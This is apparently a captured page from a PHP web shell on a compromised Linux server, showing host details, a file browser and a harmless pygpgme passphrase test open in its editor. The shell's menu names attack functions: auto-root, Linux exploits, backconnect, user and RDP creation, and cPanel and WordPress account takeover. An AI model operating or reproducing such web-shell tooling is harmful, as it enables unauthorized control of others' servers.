Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.224.54.118
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pygpgme-0.3 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
keys
[ DIR ]
drwxr-xr-x
__init__.py
1.85
KB
-rw-r--r--
test_context.py
5.28
KB
-rw-r--r--
test_delete.py
2.27
KB
-rw-r--r--
test_editkey.py
3.31
KB
-rw-r--r--
test_encrypt_decrypt.py
8.33
KB
-rw-r--r--
test_export.py
2.02
KB
-rw-r--r--
test_genkey.py
3.76
KB
-rw-r--r--
test_import.py
7.52
KB
-rw-r--r--
test_keylist.py
2.76
KB
-rw-r--r--
test_keys.py
12.08
KB
-rw-r--r--
test_passphrase.py
2.95
KB
-rw-r--r--
test_progress.py
1.94
KB
-rw-r--r--
test_sign_verify.py
12.97
KB
-rw-r--r--
util.py
1.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_passphrase.py
# pygpgme - a Python wrapper for the gpgme library # Copyright (C) 2006 James Henstridge # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import unittest import os try: from io import BytesIO except ImportError: from StringIO import StringIO as BytesIO from textwrap import dedent import gpgme from tests.util import GpgHomeTestCase class PassphraseTestCase(GpgHomeTestCase): import_keys = ['passphrase.pub', 'passphrase.sec'] def test_sign_without_passphrase_cb(self): ctx = gpgme.Context() key = ctx.get_key('EFB052B4230BBBC51914BCBB54DCBBC8DBFB9EB3') ctx.signers = [key] plaintext = BytesIO(b'Hello World\n') signature = BytesIO() try: new_sigs = ctx.sign(plaintext, signature, gpgme.SIG_MODE_CLEAR) except gpgme.GpgmeError as exc: self.assertEqual(exc.args[0], gpgme.ERR_SOURCE_GPGME) self.assertEqual(exc.args[1], gpgme.ERR_BAD_PASSPHRASE) else: self.fail('gpgme.GpgmeError not raised') def passphrase_cb(self, uid_hint, passphrase_info, prev_was_bad, fd): self.uid_hint = uid_hint self.passphrase_info = passphrase_info self.prev_was_bad = prev_was_bad os.write(fd, b'test\n') def test_sign_with_passphrase_cb(self): ctx = gpgme.Context() key = ctx.get_key('EFB052B4230BBBC51914BCBB54DCBBC8DBFB9EB3') ctx.signers = [key] ctx.passphrase_cb = self.passphrase_cb plaintext = BytesIO(b'Hello World\n') signature = BytesIO() self.uid_hint = None self.passphrase_info = None self.prev_was_bad = None new_sigs = ctx.sign(plaintext, signature, gpgme.SIG_MODE_CLEAR) # ensure that passphrase_cb has been run, and the data it was passed self.assertEqual(self.uid_hint, '54DCBBC8DBFB9EB3 Passphrase (test) <passphrase@example.org>') self.assertEqual(self.passphrase_info, '54DCBBC8DBFB9EB3 54DCBBC8DBFB9EB3 17 0') self.assertEqual(self.prev_was_bad, False) self.assertEqual(new_sigs[0].type, gpgme.SIG_MODE_CLEAR) self.assertEqual(new_sigs[0].fpr, 'EFB052B4230BBBC51914BCBB54DCBBC8DBFB9EB3') def test_suite(): loader = unittest.TestLoader() return loader.loadTestsFromName(__name__)
Close